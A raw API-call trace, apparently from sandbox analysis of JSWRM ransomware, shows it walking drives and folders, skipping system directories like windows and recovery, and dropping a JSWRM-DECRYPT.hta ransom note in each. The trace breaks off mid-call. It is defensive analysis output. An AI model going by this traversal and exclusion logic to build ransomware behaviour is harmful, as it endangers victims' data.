0x22d0a0 [0058.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.140] GetFileAttributesW (lpFileName="B:\\JSWRM-DECRYPT.hta" (normalized: "b:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0058.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.140] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x331c6a4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23bc78 [0058.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x23da48 [0058.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23bc78 | out: hHeap=0x1e0000) returned 1 [0058.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0058.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.144] CreateFileW (lpFileName="B:\\JSWRM-DECRYPT.hta" (normalized: "b:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.144] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.144] WriteFile (in: hFile=0xffffffff, lpBuffer=0x331c7b8, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x331c784, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x331c784, lpOverlapped=0x0) returned 0 [0058.144] CloseHandle (hObject=0xffffffff) returned 1 [0058.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0058.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da48 | out: hHeap=0x1e0000) returned 1 [0058.144] FindFirstFileW (in: lpFileName="B:\\*.*", lpFindFileData=0x331f840 | out: lpFindFileData=0x331f840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x9148\x20\xabb0\x21\xabb0\x21\x0a")) returned 0xffffffff [0058.144] GetCurrentThreadId () returned 0xdf0 [0058.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4f8 | out: hHeap=0x1e0000) returned 1 [0058.144] GetLastError () returned 0x3 [0058.144] SetLastError (dwErrCode=0x3) [0058.144] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x229000 | out: hHeap=0x1e0000) returned 1 [0058.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21abb8 | out: hHeap=0x1e0000) returned 1 Thread: id = 78 os_tid = 0xfb0 [0058.145] GetLastError () returned 0x57 [0058.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21abb8 [0058.146] SetLastError (dwErrCode=0x57) [0058.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0058.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.146] GetFileAttributesW (lpFileName="C:\\JSWRM-DECRYPT.hta" (normalized: "c:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0058.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c894, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23bc78 [0058.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x23da48 [0058.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23bc78 | out: hHeap=0x1e0000) returned 1 [0058.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0058.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.147] CreateFileW (lpFileName="C:\\JSWRM-DECRYPT.hta" (normalized: "c:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x448 [0058.149] SetFilePointer (in: hFile=0x448, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.149] WriteFile (in: hFile=0x448, lpBuffer=0x345c9a8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c974, lpOverlapped=0x0 | out: lpBuffer=0x345c9a8*, lpNumberOfBytesWritten=0x345c974*=0x230c, lpOverlapped=0x0) returned 1 [0058.150] CloseHandle (hObject=0x448) returned 1 [0058.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0058.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da48 | out: hHeap=0x1e0000) returned 1 [0058.151] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x345fa30 | out: lpFindFileData=0x345fa30*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="$GETCU~1")) returned 0x231d80 [0058.152] lstrcmpiW (lpString1="$GetCurrent", lpString2=".") returned -1 [0058.152] lstrcmpiW (lpString1="$GetCurrent", lpString2="..") returned -1 [0058.152] lstrcmpiW (lpString1="$GetCurrent", lpString2="...") returned -1 [0058.152] lstrcmpiW (lpString1="$GetCurrent", lpString2="windows") returned -1 [0058.152] lstrcmpiW (lpString1="$GetCurrent", lpString2="recovery") returned -1 [0058.152] lstrcmpiW (lpString1="$GetCurrent", lpString2="perflogs") returned -1 [0058.152] lstrcmpiW (lpString1="$GetCurrent", lpString2="documents and settings") returned -1 [0058.152] lstrcmpiW (lpString1="$GetCurrent", lpString2="$RECYCLE.BIN") returned -1 [0058.152] lstrcmpiW (lpString1="$GetCurrent", lpString2="system volume information") returned -1 [0058.152] lstrcmpiW (lpString1="$GetCurrent", lpString2="msocache") returned -1 [0058.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0058.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0058.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0058.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0058.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0058.152] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\JSWRM-DECRYPT.hta" (normalized: "c:\\$getcurrent\\jswrm-decrypt.hta")) returned 0xffffffff [0058.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0058.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c894, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0058.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23bc78 [0058.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0058.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x23da48 [0058.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23bc78 | out: hHeap=0x1e0000) returned 1 [0058.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0058.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0058.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0058.154] CreateFileW (lpFileName="C:\\$GetCurrent\\JSWRM-DECRYPT.hta" (normalized: "c:\\$getcurrent\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0058.155] SetFilePointer (in: hFile=0x44c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.155] WriteFile (in: hFile=0x44c, lpBuffer=0x345c9a8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c974, lpOverlapped=0x0 | out: lpBuffer=0x345c9a8*, lpNumberOfBytesWritten=0x345c974*=0x230c, lpOverlapped=0x0) returned 1 [0058.156] CloseHandle (hObject=0x44c) returned 1 [0058.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0058.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da48 | out: hHeap=0x1e0000) returned 1 [0058.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0058.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0058.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0058.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0058.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0058.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0058.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0058.156] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\JSWRM-DECRYPT.hta" (normalized: "c:\\$getcurrent\\jswrm-decrypt.hta")) returned 0x20 [0058.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0058.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0058.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0058.157] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\*.*", lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x19539cb2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1f6726, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0058.157] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.157] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x19539cb2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1f6726, cFileName="..", cAlternateFileName="")) returned 1 [0058.157] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.157] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.157] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19539cb2, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x19539cb2, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x19539cb2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1f6726, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0058.157] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0058.157] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0058.157] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0058.157] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0058.157] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0058.157] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0058.157] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0058.157] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0058.157] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0058.157] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0058.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0058.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0058.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0058.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0058.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0058.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0058.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0058.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0058.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0058.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0058.158] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1f6726, cFileName="Logs", cAlternateFileName="")) returned 1 [0058.158] lstrcmpiW (lpString1="Logs", lpString2=".") returned 1 [0058.158] lstrcmpiW (lpString1="Logs", lpString2="..") returned 1 [0058.158] lstrcmpiW (lpString1="Logs", lpString2="...") returned 1 [0058.158] lstrcmpiW (lpString1="Logs", lpString2="windows") returned -1 [0058.158] lstrcmpiW (lpString1="Logs", lpString2="recovery") returned -1 [0058.158] lstrcmpiW (lpString1="Logs", lpString2="perflogs") returned -1 [0058.158] lstrcmpiW (lpString1="Logs", lpString2="documents and settings") returned 1 [0058.158] lstrcmpiW (lpString1="Logs", lpString2="$RECYCLE.BIN") returned 1 [0058.158] lstrcmpiW (lpString1="Logs", lpString2="system volume information") returned -1 [0058.158] lstrcmpiW (lpString1="Logs", lpString2="msocache") returned -1 [0058.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0058.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0058.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0058.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x233230 [0058.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.158] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\JSWRM-DECRYPT.hta" (normalized: "c:\\$getcurrent\\logs\\jswrm-decrypt.hta")) returned 0xffffffff [0058.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0058.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0058.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23bc78 [0058.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0058.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x23da48 [0058.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23bc78 | out: hHeap=0x1e0000) returned 1 [0058.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232c80 [0058.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.162] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\JSWRM-DECRYPT.hta" (normalized: "c:\\$getcurrent\\logs\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0058.163] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.163] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0058.164] CloseHandle (hObject=0x450) returned 1 [0058.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0058.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da48 | out: hHeap=0x1e0000) returned 1 [0058.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0058.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0058.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0058.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x233090 [0058.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.165] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\JSWRM-DECRYPT.hta" (normalized: "c:\\$getcurrent\\logs\\jswrm-decrypt.hta")) returned 0x20 [0058.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0058.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.165] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\Logs\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x19539cb2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22d286, cFileName=".", cAlternateFileName="")) returned 0x231cc0 [0058.165] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.165] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x19539cb2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22d286, cFileName="..", cAlternateFileName="")) returned 1 [0058.165] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.165] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.165] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x60002, dwReserved1=0x22d286, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="DOWNLE~1.LOG")) returned 1 [0058.165] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2=".") returned 1 [0058.165] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="..") returned 1 [0058.165] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="...") returned 1 [0058.165] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="windows") returned -1 [0058.165] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="recovery") returned -1 [0058.166] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="perflogs") returned -1 [0058.166] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="documents and settings") returned 1 [0058.166] lstrcmpiW 